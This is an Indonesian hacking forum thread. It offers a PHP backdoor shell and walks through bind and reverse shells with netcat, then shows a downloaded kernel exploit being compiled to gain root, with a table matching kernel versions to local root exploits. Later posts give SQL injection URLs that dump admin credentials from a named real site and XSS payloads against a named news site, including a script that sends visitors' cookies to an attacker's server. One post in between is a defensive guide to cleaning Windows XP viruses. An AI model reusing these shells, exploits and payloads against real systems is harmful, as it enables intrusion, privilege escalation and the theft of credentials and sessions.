simple php shell (backdoor)
Posted
enjoy,,
just 14 kb..
download disini
Posted
by Syn0madeous on 29 May 2009, 03:22
Posted
(netcat hrus dah diinstall yah)
buka php-shellnya
liat yg dibagian atas ada server-ip dan your-ip
yg server ip itu ip-addressnya si target,, dan your ip itu ip address kita
klik di menu netsploit
ada dua cara koneksi (bind dan back-connect)
klo bind-connect
di server buka port dan nunggu koneksi dari kita
klo back-connect
kita buka port dan nunggu koneksi dari server...
----lanjutt
cobain yg bind-connect dulu aja
ada dua script.. satu pake perl satu lagi pake bahasa c, klo gcc di disable, pake yg perl, dan sebaliknya
oh ya,,, cari folder yg ada write permission -nya,,, klo gak nemu pindah ke /tmp/ aja
masukkin nomer port yg mau dibuka untuk listening trus pilih password , klik di tombol 'bind'
abis itu tunggu sbentar,,,
dari komputer kmu buka terminal/ms-dos prompt
trus konek pake netcat ke server
misalnya server ip nya 212.212.212.212 dan portnya 13123
$ nc 212.212.212.212 13123
bash: no job control in this shell
[ 17:37 ] nobody:/tmp$ ls
bdp
flashgot.z8t0a58f.default
gedit.ketek90.2662082588
keyring-GTMRnt
libgksu-7t347l
orbit-ketek90
orbit-root
pulse-ketek90
seahorse-0qlTmU
ssh-RnMftS5976
Tracker-ketek90.6236
virtual-ketek90.lCZNc9
[ 17:37 ] nobody:/tmp$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
keterangan:
-l --> listening (nunggu koneksi)
-p --> nomer port , kita kan pake port 13123
$ nc -l -p 13123
Linux 6292 2.6.24.11-generic #1 SMP Thu Jan 29 19:24:39 UTC 2009 i686 GNU/Linux
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
$ ls
bcp
bdp
flashgot.z8t0a58f.default
gedit.ketek90.2662082588
keyring-GTMRnt
libgksu-7t347l
orbit-ketek90
orbit-root
pulse-ketek90
seahorse-0qlTmU
ssh-RnMftS5976
Tracker-ketek90.6236
virtual-ketek90.lCZNc9
$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
$ uname -a
Linux 6292 2.6.24.11-generic #1 SMP Thu Jan 29 19:24:39 UTC 2009 i686 GNU/Linux
$ wget http://www.milw0rm.com/exploits/download/5092
--2009-03-29 17:55:30-- http://www.milw0rm.com/exploits/download/5092
Resolving www.milw0rm.com... 76.74.9.18
Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: `5092'
[ <=> ] 6,292 --.-K/s in 0.1s
2009-03-29 17:55:31 (41.5 KB/s) - `5092' saved [6292]
$ ls
5092
bcp
bdp
flashgot.z8t0a58f.default
gedit.ketek90.2662082588
keyring-GTMRnt
libgksu-7t347l
orbit-ketek90
orbit-root
pulse-ketek90
seahorse-0qlTmU
ssh-RnMftS5976
Tracker-ketek90.6236
virtual-ketek90.lCZNc9
$ mv 5092 5092.c
$ gcc 5092.c -static -Wno-format
$ ls
5092.c
a.out
bcp
bdp
flashgot.z8t0a58f.default
gedit.ketek90.2662082588
keyring-GTMRnt
libgksu-7t347l
orbit-ketek90
orbit-root
pulse-ketek90
seahorse-0qlTmU
ssh-RnMftS5976
Tracker-ketek90.6236
virtual-ketek90.lCZNc9
$ chmod +x a.out
$ ./a.out
$ id
uid=0(root) gid=0(root) groups=0(root)
klo gagal,,pke exploit yg lain,,, atu gak liat servis yg jalan di server,,,cari exploitnya,,
---
compile file ini..
$ b374k
bash-3.2# id
uid=0(root) gid=1000(ketek90) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(ketek90)
2.4.17
newlocal
kmod
2.4.18
brk
brk2
newlocal
kmod
km.2
2.4.19
brk
brk2
newlocal
kmod
km.2
2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2
2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod
2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod
2.4.22-10
loginx
./loginx
2.4.23
mremap_pte
2.4.24
mremap_pte
Uselib24
2.4.25-1
uselib24
2.4.27
Uselib24
2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit
2.6.2
mremap_pte
krad
h00lyshit
2.6.5 to 2.6.10
krad
krad2
h00lyshit
2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit
2.6.9-34
r00t
h00lyshit
2.6.13-17
prctl
h00lyshit
-------------------
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.11 ve 2.6.16 Arasi -> prctl, raptor, raptor2, h00lyshit
2.6.17 ve Ustlerinde -> 06 cw7.3 Jessica x x2
2.6.23 - 2.6.24 -> diane_lane_******_hard.c (http://milw0rm.com/exploits/5093)
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c (http://milw0rm.com/exploits/5092)
Posted
Beberapa tahun belakangan banyak bermunculan virus-virus yang mulai merepotkan masyarakat pengguna komputer. Kalau dahulu pengguna internet saja yang dipusingkan oleh virus karena penyebarannya yang masih terbatas melalui email dan jaringan. Seiring perkembangan teknologi maka perangkat mobile teknologi informasi juga berkembang. Saat ini hampir tiap pengguna komputer pasti memiliki flash disk yang merupakan media penyimpanan data yang sangat portable dan mudah digunakan karena sifatnya seperti disket namun dengan kapasitas besar dan tidak mudah rusak. Namun kepopuleran flash disk di pengguna komputer memancing para pembuat virus untuk membuat virus yang menyebar melalui media penyimpanan ini. Hal ini membuat para pengguna yang kurang paham komputer terkadang tertipu karena menjalankan virus yang disangkanya adalah file lain seperti file dokumen Microsoft Word, Folder, atau bentuk file lainnya. Padahal yang sedang dibuka adalah program virus yang memiliki icon sama dengan file-file tersebut.
Tidak perlu membahas terlalu panjang sejarah kemunculan virus ini, namun buat pengguna yang sudah terkena virus maka sebenarnya langkah pembasmian virus-virus tersebut hampir sama. Biasanya masyarakat umum yang tidak memiliki akses internet di komputernya akan lebih mudah terkena virus karena antivirus yang tidak up to date sehingga antivirus miliknya tidak mengenali virus-virus baru. Ada beberapa cara menghilangkan virus dari komputer anda bila sudah terlanjur terinfeksi virus ini. Teknik-teknik berikut dibahas pada sistem operasi Windows XP karena OS inilah yang paling umum terinfeksi dan paling banyak digunakan. Berikut adalah teknik teknik tersebut:
Dengan melepaskan hardisk komputer yang telah terinfeksi virus kemudian dipasangkan ke komputer lain yang memilki antivirus yang terbaru atau setidaknya mampu mengenali virus di sistem yang telah terinfeksi. Lakukan full scanning pada hardisk sistem yang terinfeksi dan hapus semua virus yang ditemukan. Setelah selesai hardisk tersebut sudah dapat dipasang kembali dikomputer dan jalankan sistem seperti biasa. Lakukan pemeriksaan kembali apakah komputer masih menunjukkan gejala yang sama saat terkena virus. Cara ini ampuh membersihkan virus sepanjang antivirus di komputer lain tersebut dapat mengenali dan menghapus virus di hardisk yang terinfeksi. Namun virus masih meninggalkan jejak berupa autorun atau startup yang tidak berfungsi. Jejak ini terkadang memunculkan pesan error yang tidak berbahaya namun mungkin sedikit mengganggu.
Pada laptop atau komputer yang tidak dapat dilepas harddisknya maka cara lain adalah menjalankan sistem operasi lain yang tidak terinfeksi virus dan melakukan full scan terhadap seluruh harddisk. Biasanya ada beberpa pengguna yang menggunakan dual OS seperti Linux dan Windows atau Windows XP dan Windows Vista dsb. Selain itu bisa juga menggunakan LiveCD atau OS Portable seperti Knoopix dan Windows PE ( Windows yang telah diminimazed dan dapat dibooting dari media penyimpanan portable seperti flash disk atau CD.) lalu lakukan full scanning dengan antivirus terbaru. Efektifnya sama dengan menghapus virus dengan antivirus di komputer lain contoh diatas. Virus terkadang masih meninggalkan jejak tidak berbahaya.
Bila anda kesulitan melakukan hal diatas masih ada cara lain yaitu dengan cara manual. Langkah-langkah tersebut adalah:
C:\WINDOWS\system32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\Explorer.exe
Selain process explorer anda bisa menggunakan tools lainnya yang mungkin lebih mudah dan bisa menghapus process sekaligus. Contoh lain adalah HijackFree. Anda bisa mencari di google tools sejenis.
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000000
"SuperHidden"=dword:00000000
"ShowSuperHidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot]
"AlternateShell"="Cmd.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot]
"AlternateShell"="Cmd.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
"AlternateShell"="Cmd.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"Userinit"="C:\WINDOWS\system32\userinit.exe,"
[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@="regedit.exe \"%1\""
[HKEY_CLASSES_ROOT\scrfile\shell\open\command]
@="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command]
@="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command]
@="\"%1\" %*"
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
File registry diatas akan membuka blokir regedit, mencegah virus mencangkokkan dirinya pada sistem, dan reset parameter lain untuk mencegah virus jalan lagi.
Itulah langkah-langkah penghapusan virus pada sistem Windows XP. Untuk mencegah virus datang kembali sebaiknya anda rajin update antivirus atau memasang aplikasi pencegah seperti WinPooch atau Comodo Firewall yang akan memperingatkan pengguna bila ada program lain yang akan memodifikasi sistem. Jadi walaupun virus tersebut tidak dikenali akan tetapi sebelum masuk maka pengguna akan diperingatkan oleh aplikasi pencegah. Bila anda mengenali program yang hendak mengakses sistem anda maka anda bisa mengijinkan akses tersebut namun bila tidak sebaiknya tolak dan blokir akses tersebut karena ada kemungkinan program tersebut adalah virus.
Berhati-hati pada saat membuka flash disk. Jangan membuka flash disk dengan klik 2 kali. Buka dengan klik kanan lalu pilih menu Open agar fitur autoplay pada flash disk tidak menjalankan virus secara ototmatis. Jangan lupa perhatikan file yang anda buka. Walaupun iconnya sama perhatikan bahwa file yang anda buka buka tipe application atau program. Pastikan file word adalah betul-betul word dan folder betul-betul folder bisa dengan melihat detail atau properties dari file tsb. Semoga artikel ini membantu dan mencegah anda terinfeksi virus komputer.
Posted
Posted
TErlebih dahulu kita harus login sebagai user untuk dapat membaca berita,,
http://banksoal-online.com/
http://banksoal-online.com/evenberita.php?fcmd=DETAIL&id=55
1.memunculkan error: http://banksoal-online.com/evenberita.php?fcmd=DETAIL&id=55'
2.Memeriksa jumlah field dari suatu tabel:
->http://banksoal-online.com/evenberita.php?fcmd=DETAIL&id=55%20order%20by%2021-- #gk error#
->http://banksoal-online.com/evenberita.php?fcmd=DETAIL&id=55%20order%20by%2022-- #error#
3.Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan: http://banksoal-online.com/evenberita.php?fcmd=DETAIL&id=-55%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
4.mengeluarkan nama-nama tabel: http://banksoal-online.com/evenberita.php?fcmd=DETAIL&id=-55%20union%20select%201,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables%20where%20table_schema=database()--
5.memunculkan nama field dari tabel tuseradmin: http://banksoal-online.com/evenberita.php?fcmd=DETAIL&id=-55%20union%20select%201,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.columns%20where%20table_name=0x747573657261646d696e--
nama tabel,yakni dlm hal ini users,harus dikonversikan ke hex,, untuk mengubah string ke hex,silahkan kesini http://www.string-functions.com/string-hex.aspx
5.Langkah terakhir kita akan mengeluarkan record-record dari tabel tuseradmin: http://banksoal-online.com/evenberita.php?fcmd=DETAIL&id=-55%20union%20select%201,2,3,4,5,group_concat(userid,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20tuseradmin--
admin telah diberitahu,, dan di respon dengan baik,,
maju terus IT indonesia,,
Posted
XXS attack
Proof of Concept (pembuktian)
####################################
Apa itu xss attack??? silakan cari disini : google.com atau jasakom.com
target : http://pemilu.antara.co.id
1.mengetaui site itu mempunyai celah xss attack:
->masukkan javascript untuk memunculkan kotak dialog(pd contoh ini script dimasukkan melalui fasilitas search yg terdapat pd site tsb),contoh:
contoh: http://pemilu.antara.co.id/search/?skey=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&schclicked=Cari
2.jika site itu terkena bug xss attack,maka banyak yg dpt kita lakukan dgn memanfaatkan kelemahan tsb,misalnya:
->mendeface
contoh : http://pemilu.antara.co.id/search/?skey=%3Chtml%3E%3Cbody%3E%3Cimg%20src=%22http://img184.imageshack.us/img184/8559/sukro2sj5.jpg%22%3E%3C/body%3E%3C/html%3E&schclicked=Cari
->mencuri cookie
Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.
Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.
Nah buat pertamanya ambil Cookie Logger Di http://G0t-Root.net/tools/cookie.php
Ok sekarang gw anggap lo dah memilikinya save dengan extensien Php dan upload ke server lo, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
masukan code ini->
Code:window.location = "http://server lo.com/cookielogger.php?c="+document.cookie
atau
Code:document.location = "http://Server lo.com/cookielogger.php?c="+document.cookie
hingga otomatis url pada site berubah menjadi
Code: http://Target.com/search.php?q=document.location = "http://server lo.com/cookielogger.php?c="+document.cookie
Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.